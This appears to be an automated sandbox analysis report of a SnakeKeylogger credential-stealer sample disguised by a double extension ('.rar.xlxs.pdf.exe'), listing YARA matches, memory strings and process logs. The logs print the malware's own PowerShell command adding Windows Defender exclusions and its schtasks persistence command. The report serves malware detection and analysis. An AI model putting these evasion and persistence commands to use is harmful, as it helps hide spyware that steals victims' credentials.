Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 20_2_06A78DF9	20_2_06A78DF9
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 20_2_06A7ED60	20_2_06A7ED60
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 20_2_06A7ED70	20_2_06A7ED70
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 20_2_06A75280	20_2_06A75280
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 20_2_06A7FA6A	20_2_06A7FA6A
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 20_2_06A7FA78	20_2_06A7FA78
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 20_2_06A72278	20_2_06A72278
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 20_2_06A71B97	20_2_06A71B97
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 20_2_06A70B20	20_2_06A70B20
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 20_2_06A7D360	20_2_06A7D360
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 20_2_06A70013	20_2_06A70013
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 20_2_06A7E067	20_2_06A7E067
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 20_2_06A7E068	20_2_06A7E068
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 20_2_06A70040	20_2_06A70040
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 20_2_06A7F1B9	20_2_06A7F1B9
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 20_2_06A7F1C8	20_2_06A7F1C8
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 20_2_06A7E917	20_2_06A7E917
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 20_2_06A7E918	20_2_06A7E918
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 20_2_06A72962	20_2_06A72962

Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1360405295.0000000002EE2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000000.1303500210.0000000000982000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNRtD.exeH vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1358331293.00000000010BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000002.1369980266.000000000A000000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3761158105.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3760065848.0000000000446000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Binary or memory string: OriginalFilenameNRtD.exeH vs GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 20.2.SOFcFE.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 20.2.SOFcFE.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000014.00000002.3760059045.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: SOFcFE.exe PID: 7376, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: SOFcFE.exe PID: 7664, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SOFcFE.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, B----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, B----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, B----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, B----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, B----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, B----.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, gCmqqu34SWaskVT2xX.cs	Security API names: _0020.SetAccessControl
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, gCmqqu34SWaskVT2xX.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, gCmqqu34SWaskVT2xX.cs	Security API names: _0020.AddAccessRule
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, AkvZU4WDIaFkxJmh7r.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, AkvZU4WDIaFkxJmh7r.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, gCmqqu34SWaskVT2xX.cs	Security API names: _0020.SetAccessControl
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, gCmqqu34SWaskVT2xX.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, gCmqqu34SWaskVT2xX.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/15@5/5

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

File created: C:\Users\user\AppData\Roaming\SOFcFE.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_03

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

File created: C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp

Jump to behavior

Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 00000001.00000000.1303500210.0000000000982000.00000002.00000001.01000000.00000003.sdmp, SOFcFE.exe.1.dr	Binary or memory string: select * from [card] where [card].id = (select employees.[card] from employees where employees.id =quse employees; select [name] from department where id =
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3763226390.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000003029000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000003035000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000003003000.00000004.00000800.00020000.00000000.sdmp, SOFcFE.exe, 00000014.00000002.3763196888.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Virustotal: Detection: 27%
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe	ReversingLabs: Detection: 50%

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

File read: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SOFcFE.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process created: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\SOFcFE.exe C:\Users\user\AppData\Roaming\SOFcFE.exe
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmp1AF7.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process created: C:\Users\user\AppData\Roaming\SOFcFE.exe "C:\Users\user\AppData\Roaming\SOFcFE.exe"
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SOFcFE.exe"	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process created: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmp1AF7.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process created: C:\Users\user\AppData\Roaming\SOFcFE.exe "C:\Users\user\AppData\Roaming\SOFcFE.exe"	Jump to behavior

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Section loaded: wldp.dll	Jump to behavior
